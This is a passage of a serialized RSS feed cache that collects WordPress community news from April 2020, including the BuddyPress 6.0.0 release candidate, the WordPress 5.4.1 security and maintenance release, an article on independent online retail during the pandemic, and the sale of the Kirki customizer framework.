\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 30 Apr 2020 19:48:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"BuddyPress: BuddyPress 6.0.0 Release Candidate\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://buddypress.org/?p=311340\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://buddypress.org/2020/04/buddypress-6-0-0-release-candidate/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3360:\"

Hello BuddyPress community members!

\n\n\n\n

The first release candidate for BuddyPress 6.0.0 is now available for a last round of testing!

\n\n\n\n

This is an important milestone as we progress toward the BuddyPress 6.0.0 final release date. “Release Candidate” means that we think the new version is ready for release, but with more than 200,000 active installs, hundreds of BuddyPress plugins and Thousands of WordPress themes, it’s possible something was missed.

\n\n\n\n
\"\"
\n\n\n\n

BuddPress 6.0.0 is slated for release on Thursday, May 14, but we need your help to get there—if you haven’t tried 6.0.0 yet, now is the time!

\n\n\n\n

You can test the 6.0.0-RC pre-release in 4 ways :

\n\n\n\n\n\n\n\n

A detailed changelog will be part of our official release note, but you can get a quick overview by reading the post about the 6.0.0 Beta1 release.

\n\n\n\n
\n\n\n\n

Plugin and Theme Developers

\n\n\n\n

Please test your plugins and themes against BuddyPress 6.0.0. If you find compatibility problems, please be sure to post to this specific support topic so we can figure those out before the final release. We strongly advise you to have a look at the 6.0.0 development notes to figure out what to focus on during your testing.

\n\n\n\n
\n\n\n\n

Polyglots, we need you!

\n\n\n\n

Do you speak a language other than English? Help us translate BuddyPress into many languages! This release also marks the string freeze point of the 6.0.0 release schedule. For your information, we are now using WP CLI to generate the buddypress.pot file and you’ll see we’ve paid attention to add translators comments to all the strings needing some.

\n\n\n\n

If you think you’ve found a bug, please let us know reporting it on the support forums and/or on our development tracker.

\n\n\n\n

Thanks in advance for giving the release candidate a test drive!

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 30 Apr 2020 00:45:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Mathieu Viet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: WordPress 5.4.1 Addresses 7 Security Issues and Fixes Several Bugs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=99123\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:197:\"https://wptavern.com/wordpress-5-4-1-addresses-7-security-issues-and-fixes-several-bugs?utm_source=rss&utm_medium=rss&utm_campaign=wordpress-5-4-1-addresses-7-security-issues-and-fixes-several-bugs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5888:\"

WordPress 5.4.1, a security and maintenance release, dropped today. The release addresses seven security issues, which were all responsibly disclosed to the WordPress security team. Core developers also included several fixes for code regressions in the previous version 5.4 release and ported bug fixes to the block editor from the Gutenberg plugin.

\n\n\n\n

End-users with automatic updates enabled should begin seeing their sites updated shortly. Other users should update as soon as possible to make sure they are running a version of WordPress with the latest security fixes.

\n\n\n\n

The WordPress support team has published the full release documentation for those who wish to view it.

\n\n\n\n

Security fixes were added to every major version of WordPress from 5.4 back to 3.7. The following vulnerabilities were addressed:

\n\n\n\n\n\n\n\n

Block Editor Updates

\n\n\n\n

Several fixes were high priority enough from the Gutenberg plugin to port to the WordPress 5.4.1 release. The biggest user-facing issues were a broken block duplication keyboard shortcut, misaligned buttons blocks, and odd scrolling behavior when attempting to edit text in a long block.

\n\n\n\n

The following is a full list of the issues the development team addressed:

\n\n\n\n\n\n\n\n

To review the code changes to the block editor in-depth, see the full ticket list.

\n\n\n\n

Other Core WordPress Changes

\n\n\n\n

Users who run their browsers in dark mode can rejoice if they also use the core WordPress favicon. The team introduced an updated favicon with a light background so that it no longer washes out. It is a minor fix but makes the famed WordPress logo look more professional.

\n\n\n\n

The heading level, which was previously set to <h3>, has been bumped up one level on the WordPress admin freedoms screen (wp-admin/freedoms.php). This change provides the proper heading level and should help screen-reading users better navigate the page.

\n\n\n\n

For users on the Edge or iOS Safari browsers who could not select files in the media library, it was due to a CSS issue that hid the input. This should no longer be an issue in the new update.

\n\n\n\n

WordPress 5.4.1 addressed some regressions from the previous version. One revolves around posting by email when no post title was added. In that scenario, the email subject should have been used as the title, but this was broken by a code change in WordPress 5.4. For developers, the category_link and tag_link filter hooks were mistakenly deprecated previously and are now once again good to use without throwing a notice.

\n\n\n\n

Plugin developers have a few bug fixes to look forward to. The WP_Site_Health object is now instantiated after the plugins_loaded and after_setup_theme hooks, which means they can perform necessary actions before the site health is checked. The deprecated wp_get_user_request_data() function is now correctly loaded on the front end, which was causing errors with plugins such as BuddyPress.

\n\n\n\n

In a larger design change, plugin authors who add custom content to the privacy policy guide can use more HTML elements. In WordPress 5.4, the guide design was updated to add a white background behind the suggested text. However, the new code only applied to paragraphs. Now, the design supports tables, lists, and other elements that are commonly used. Unordered lists also have bullet points to distinguish them from paragraphs.

\n\n\n\n

The development team fixed two issues with the REST API. The first corrected an issue with the get_item permissions check. The second fixed the _fields filtering. The core code now uses the rest_is_field_included() function to determine which fields to include to permit filtering by nested field properties.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Apr 2020 20:39:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"WordPress.org blog: WordPress 5.4.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8553\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/news/2020/04/wordpress-5-4-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6915:\"

WordPress 5.4.1 is now available!

\n\n\n\n

This security and maintenance release features 17 bug fixes in addition to 7 security fixes. Because this is a security release, it is recommended that you update your sites immediately. All versions since WordPress 3.7 have also been updated.

\n\n\n\n

WordPress 5.4.1 is a short-cycle security and maintenance release. The next major release will be version 5.5.

\n\n\n\n

You can download WordPress 5.4.1 by downloading from WordPress.org, or visit your Dashboard → Updates and click Update Now.

\n\n\n\n

If you have sites that support automatic background updates, they’ve already started the update process.

\n\n\n\n

Security Updates

\n\n\n\n

Seven security issues affect WordPress versions 5.4 and earlier. If you haven’t yet updated to 5.4, all WordPress versions since 3.7 have also been updated to fix the following security issues:

\n\n\n\n\n\n\n\n

Thank you to all of the reporters for privately disclosing the vulnerabilities. This gave the security team time to fix the vulnerabilities before WordPress sites could be attacked.

\n\n\n\n

For more information, browse the full list of changes on Trac, or check out the version 5.4.1 HelpHub documentation page.

\n\n\n\n

In addition to the security researchers mentioned above, thank you to everyone who helped make WordPress 5.4.1 happen:

\n\n\n\n

Alex Concha, Andrea Fercia, Andrew Duthie, Andrew Ozz, Andy Fragen, Andy Peatling, arnaudbroes, Chris Van Patten, Daniel Richards, DhrRob, Dono12, dudo, Ehtisham Siddiqui, Ella van Durpe, Garrett Hyder, Ian Belanger, Ipstenu (Mika Epstein), Jake Spurlock, Jb Audras, John Blackbourn, John James Jacoby, Jonathan Desrosiers, Jorge Costa, K. Adam White, Kelly Choyce-Dwan, MarkRH, mattyrob, Miguel Fonseca, Mohammad Jangda, Mukesh Panchal, Nick Daugherty, noahtallen, Paul Biron, Peter Westwood, Peter Wilson, pikamander2, r-a-y, Riad Benguella, Robert Anderson, Samuel Wood (Otto), Sergey Biryukov, Søren Brønsted, Stanimir Stoyanov, tellthemachines, Timothy Jacobs, Toro_Unit (Hiroshi Urabe), treecutter, and yohannp.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Apr 2020 19:56:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jake Spurlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"Akismet: Version 4.1.5 of the Akismet WordPress Plugin is Now Available\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"http://blog.akismet.com/?p=2068\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"https://blog.akismet.com/2020/04/29/version-4-1-5-of-the-akismet-wordpress-plugin-is-now-available/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1339:\"Version 4.1.5 of the Akismet plugin for WordPress is now available. It contains the following changes:\n\n\n\n\n\nTo upgrade, visit the Updates page of your WordPress dashboard and follow the instructions. If you need to download the plugin zip file directly, links to all versions are available in the WordPress plugins directory.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Apr 2020 13:12:48 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Stephane Daury\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:108:\"WPTavern: Tectonic Shifts in Retail Industry are Creating Unprecedented Opportunities for Independent Stores\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=98957\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:261:\"https://wptavern.com/tectonic-shifts-in-retail-industry-are-creating-unprecedented-opportunities-for-independent-stores?utm_source=rss&utm_medium=rss&utm_campaign=tectonic-shifts-in-retail-industry-are-creating-unprecedented-opportunities-for-independent-stores\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:12689:\"

Major retailers that are part of the critical infrastructure for distributing household essentials, healthcare items, and shelf-stable food, are raking in the cash during this pandemic. While consumer spending at bars, restaurants, and places of entertainment has dropped precipitously, spending at Amazon and Walmart has increased considerably in the past few weeks. The companies cannot hire workers fast enough to meet consumer demand.

\n\n\n\n

According to a report from Facteus, a firm that provides data from billions of transactions from over 1,000 financial services companies, Amazon and Walmart’s year-over-year growth recently hit 80% and 18%, respectively in the past few weeks.

\n\n\n\n
\n\n\n\n

The pandemic has worked as a catalyst for pre-existing trends, “accelerating the retail reckoning,” as Derek Thompson predicts in his recent article on how The Pandemic Will Change American Retail Forever. Brick and mortar storefronts are rapidly becoming obsolete in a world that is forcibly consigned to shopping from home.

\n\n\n\n

There are still many uncertainties about SARSCoV-2 and how humanity will safely find its way out of lockdown. Recovery from the virus may not confer long-term immunity and a vaccine may be more than a year away, likely pushing social distancing measures into 2021. Consumer behavior may be forever altered by this experience, as many people may continue to avoid in-person browsing at stores long after the worst is over.

\n\n\n\n

While it might seem like the retail titans are still uncontested in their domination, there are tectonic shifts happening in the retail industry that are giving smaller, independent stores an unprecedented opportunity to gain new customers online. Merchants that can adapt and excel at getting products to a homebound population stand to be the most resilient during this pandemic.

\n\n\n\n

In order to keep up with demand, Amazon has had to delay shipments of non-essential items by up to a month in some cases, prioritizing household basics and medical supplies. Major grocery retailers are competing against one another to hire furloughed workers in order to keep up with the demand for groceries with so many people eating at home. Independent stores that can be found online have the opportunity to step up and fill in the gaps where major retailers cannot meet the demand fast enough.

\n\n\n\n

People are more inclined to support small businesses right now in light of current circumstances. Amazon’s severely strained relationship with buyers, sellers, affiliates, and employees is also contributing to consumers’ eagerness to support independent stores.

\n\n\n\n

On April 21, Amazon slashed commission rates nearly in half for most product categories, negatively impacting media companies and publishers that have not diversified their affiliate revenue sources.

\n\n\n\n

Amazon’s essential workers are planning to join others from Instacart, Whole Foods, Walmart, Target, and FedEx in a strike on Friday. They are protesting their employers’ record corporate profits which they say have come at the expense of workers’ health and safety. Many consumers have already grappled with a question of conscience in continuing to shop on Amazon after hearing reports of grueling labor conditions for years.

\n\n\n\n

Another major development in the retail industry has come to light as the result of a recent Wall Street Journal investigation, which revealed that Amazon is using data from its sellers to launch competing products. Merchants selling successfully on Amazon are not safe from having their products copied and their businesses effectively cannibalized.

\n\n\n\n

Documents obtained by the WSJ, along with interviews from more than 20 former employees of Amazon’s private-label business, described how the marketplace operator uses third-party sellers’ data to gain a competitive advantage:

\n\n\n\n

In one instance, Amazon employees accessed documents and data about a bestselling car-trunk organizer sold by a third-party vendor. The information included total sales, how much the vendor paid Amazon for marketing and shipping, and how much Amazon made on each sale. Amazon’s private-label arm later introduced its own car-trunk organizers.

\n\n\n\n

The WSJ exposé details the great pressure that Amazon executives are under to deliver successful private-label products:

\n\n\n\n

Former executives said they were told frequently by management that Amazon brands should make up more than 10% of retail sales by 2022. Managers of different private-label product categories have been told to create $1 billion businesses for their segments, they said.

\n\n\n\n

This practice of launching competing products with access to third-party sellers’ data has been happening for years but is an especially hostile tactic to employ in a time when Amazon’s revenue is skyrocketing and small businesses are struggling to stay afloat. It is a sobering reminder of the value of hosting your own online store and the importance of owning your own data.

\n\n\n\n

There are some positive developments in the industry that should give small business owners confidence in maintaining independence from the dominant forces in online retail.

\n\n\n\n

Wired published an article this week titled The Coronavirus Pandemic Is Changing How People Buy Books by Kate Knibbs. She describes how one indie bookseller’s e-commerce startup has found unlikely success in positioning itself as “an easy way to buy books online without further enriching Jeff Bezos:”

\n\n\n\n

Bookshop went from a well-intentioned startup facing an uphill battle to one of the most popular ways to buy books online in a matter of weeks. The New York Times, BuzzFeed, Vox, and The New Republic are all affiliate partners now. Its headcount has doubled in size. Hunter expects to hit $6 million in sales by May, eons ahead of its loftiest projections from January. If the company’s performance holds steady, it could do $60 million in sales a year, although Hunter is assuming post-quarantine life will be different. “I’m sure that when things open back up, our sales will drop, maybe even cut in half,” he says. “But even then, we’re still one of the top 10 bookstores in the US.”

\n\n\n\n

Yesterday, Shopify launched its new Shop app, touting modularized, distributed marketplaces as the future of e-commerce. The app allows shoppers to browse local merchants and make purchases. It provides a new vehicle of exposure for the company’s 1m+ merchants on its platform. Businesses do not have to pay to have access to the app, nor do they pay commissions on the sales it generates.

\n\n\n\n

Google is also making it easier for smaller stores to be found on the web by opening up the Shopping tab to free listings and partnering with WooCommerce, Shopify, and BigCommerce. This essentially gives more free traffic to small businesses whose listings will break up the longstanding dominance of major online retailers in the Shopping tab.

\n\n\n\n

WordPress developers with e-commerce experience have the opportunity to build products and stores that will help traditional brick-and-mortar businesses start selling online quickly, so they can continue to find success in. the brave new world of online-first retail. WordPress has a plethora of plugin options for making e-commerce accessible to store owners, no matter how simple or complex the store’s requirements.

\n\n\n\n

Independent WooCommerce Stores Are Booming

\n\n\n\n

One user in the WooCommerce community’s Facebook group asked how the coronavirus is impacting members’ e-commerce stores. Responses were varied based on the types of products that the merchants were selling, but the vast majority of responses from store owners and developers were positive reports of increased sales:

\n\n\n\n\n\n\n\n

Saad Munir, the CEO of an e-commerce marketing agency, manages 28 stores for their clients with $30-$500k sales per month in various niches.

\n\n\n\n

“Some of them are popular brands of their niche,” Munir said. “We have seen a drop in sales of up to 80% in non-essential and medium luxury products, and a 400% increase in essential products. However, now non-essential and daily-use products have also started getting good sales since everyone is home and sticking to their devices during this social distancing. We also have clients of furniture e-commerce stores. This means high-ticket items. They have even seen increased sales in bedsets, sofas, etc. So, for sure online sales are increasing. We also on-boarded several new clients and most of these stores are in WooCommerce.”

\n\n\n\n

In the WooCommerce Help & Share group, one member asked for help collating all his orders into one list after his artisan cheese business increased exponentially overnight. Another member asked for help optimizing his client’s store after their pre-COVID-19 revenue went from less than £1k/month to almost £2k sales per day.

\n\n\n\n

If independent self-hosted stores are able to perform well during this crisis, they have the opportunity to earn customers’ loyalty for continued business long after social distancing requirements are no longer necessary. It’s a unique opportunity that may not have been possible on such an accelerated timeline without this exact set of circumstances.

\n\n\n\n

These recent shifts in online retail are the first cracks in the ice towards a web that is more friendly for smaller, independent stores. The trend towards buying all of life’s necessities online has evolved overnight to include a wider spectrum of consumer demographics than ever before. Diverse independent stores are crucial for meeting this demand without losing the unique and varied shopping landscape that the pandemic has forced to be temporarily closed.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Apr 2020 08:17:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"Post Status: Professional WordPress Plugin Development: Interview with the authors\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=78739\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"https://poststatus.com/professional-wordpress-plugin-development-interview-with-the-authors/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1671:\"

Professional WordPress Plugin Development was one of the most helpful books I\'ve ever read. To see a new edition with two returning authors, nine years after the original, is very exciting.

\n\n\n\n

This edition of the book will be sure to offer a great resource for developer education for years to come. Brad Williams, Justin Tadlock, and John James Jacoby are each extremely talented developers and communicators. The work they can accomplish together is even greater.

\n\n\n\n

Cory talks to them about their histories, the book, the process, and much more. We hope you enjoy this episode of Post Status Draft.

\n\n\n\n\n\n\n\n
\n\n
\n\n\n\n

You can pre-order Professional WordPress Plugin Development now on Amazon. It is slated to be released June 10th.

\n\n\n\n\n\n\n\n

Episode Partner: Gravity Forms

\n\n\n\n

Gravity Forms is the easiest-to-use and most trusted tool for creating advanced forms for your WordPress-powered website. I use Gravity Forms on every WordPress site I own, and I know I can always rely on its power, flexibility, and reliability.

\n\n\n\n

Try Gravity Forms today.

\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Apr 2020 04:27:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"WPTavern: David Vongries Takes Over as New Owner of the Kirki Customizer Framework\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=99016\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:209:\"https://wptavern.com/david-vongries-takes-over-as-new-owner-of-the-kirki-customizer-framework?utm_source=rss&utm_medium=rss&utm_campaign=david-vongries-takes-over-as-new-owner-of-the-kirki-customizer-framework\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:8410:\"

Ari Stathopoulos sold Kirki, his 6-year-old customizer framework, last week. The plugin is a widely-used tool for theme authors and currently has over 400,000 installations. It is also bundled as a drop-in package within an unknown number of themes, likely numbering in the hundreds. David Vongries, the owner of the Page Builder Framework theme, has taken over the project.

\n\n\n\n

All of Kirki’s customizer controls, including those that were previously commercial/premium, are now open under the Kirki Framework GitHub organization.

\n\n\n\n

Stathopoulos tweeted his decision to seek a buyer on April 8. “This is an announcement I never thought I’d make,” he wrote. “As much as it saddens me, I have decided to sell the Kirki #WordPress plugin. With 500,000+ installations and included in hundreds of themes I no longer have the ability – as an individual developer – to maintain it. And even though I had big dreams and wanted to facilitate things for the WordPress editor as well, the plugin has grown beyond me…It is no longer possible for a single person to maintain such a beast.”

\n\n\n\n

Between his fulltime day job, a representative role for the theme review team, and maintaining other open-source projects, Stathopoulos was pulling 16-hour days of work. Not to mention, he had the usual life elements he needed to make time for in his routine. The Kirki project was not something he could devote any extra time to. Stathopoulos said he knew that spending too much time behind the screen was detrimental to his mental and physical health. He needed to make changes for his personal well-being. Still, it was tough to let go of a project he had invested years into.

\n\n\n\n

“Letting go of a project like that feels extremely weird!” he said. “It’s a weird mix of sadness, stress, and relief. I feel sad because it’s out of my control. I feel stressed because it’s out of my control. And I feel relieved because it’s out of my control.”

\n\n\n\n

While he suspects the sadness and stress of letting go of his project will subside, he said he already feels relieved to no longer have the responsibility of managing such a huge project alone. “I am no longer responsible for the hundreds of themes that use it; it’s liberating,” he said.

\n\n\n\n

No Deal for the Highest Bidder

\n\n\n\n

Stathopoulos did not want to let this passion project go to anyone. He wanted someone with the vision to see the project evolve. He had several offers for Kirki. Over 400,000 installations can make for a lucrative opportunity for someone with the right marketing skills. It would have been easy for him to take the highest bid and jump ship, but that is not his style.

\n\n\n\n

“Kirki is a weird case,” he said. “It may have 400,000 installations and used by hundreds of themes both free and premium, but the actual ‘clients’ are the theme authors, not the end-users. That fact limits the potential for monetizing the plugin ethically. There were quite a few bids, some were high, some were low, but what surprised me is that a lot of them were not interested in helping the community in any way.”

\n\n\n\n

